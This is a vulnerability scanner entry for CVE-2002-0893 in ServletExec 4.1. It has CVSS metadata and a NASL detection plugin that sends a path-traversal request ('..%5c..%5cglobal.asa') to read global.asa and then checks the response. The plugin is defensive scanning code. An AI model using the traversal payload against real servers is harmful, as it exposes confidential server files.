CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
75.1%
By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10959");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_cve_id("CVE-2002-0893");
script_name("ServletExec 4.1 ISAPI File Reading");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2002 Matt Moore");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");
script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");
script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)");
script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
are returned. Text files can generally be read without problem.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
port = http_get_port(default:80);
# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
exit(0);
if("OBJECT RUNAT=Server" >< res) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);